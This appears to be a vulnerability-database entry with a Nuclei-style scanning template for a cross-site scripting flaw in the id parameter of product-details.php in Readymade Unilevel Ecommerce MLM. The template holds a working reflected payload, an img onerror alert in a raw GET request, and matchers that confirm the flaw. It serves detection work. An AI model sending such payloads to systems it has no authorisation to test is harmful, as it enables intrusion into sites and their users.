readymade-unilevel-xss: Readymade Unilevel Ecommerce MLM - Cross-Site Scripting

Date: 2025-08-01 | Affected software: Readymade Unilevel Ecommerce MLM | PoC: public

Vulnerability description

Readymade Unilevel Ecommerce software has a cross-site scripting (XSS) vulnerability in the id parameter of product-details.php (product-details.php?id).

PoC code [public]

id: readymade-unilevel-xss

info:
  name: Readymade Unilevel Ecommerce MLM - Cross-Site Scripting
  author: s4e-io
  severity: high
  description: |
    Readymade Unilevel Ecommerce software has xss vulnerability in product-details.php?id
  reference:
    - https://packetstormsecurity.com/files/179886/ReadyMade-Unilevel-Ecommerce-MLM-Blind-SQL-Injection-Cross-Site-Scripting.html
  metadata:
    vendor: i-netsolution
    product: readymade-unilevel-ecommerce
  tags: ecommerce,readymade,xss,vuln

variables:
  num1: "{{rand_int(1000, 9999)}}"

http:
  - raw:
      - |
        GET /product-details.php?id=1"><img/src/onerror=.1|alert`{{num1}}`+class={{num1}}> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "><img/src/onerror=.1|alert`{{num1}}` class={{num1}}>", "user_login_id")'
          - 'contains(content_type, "text/html")'
          - "status_code == 200"
        condition: and
# digest: 4b0a004830460221009997a208b1c9b49ecd9ad2ba8258473c25ada36d4e85528ba5502f378cc4953a022100a569cc67101987897a61bd8e405e415f9ecdacf7991ab79dc0d2848854a6efeb:922c64590222798bb761d5b6d8e72950
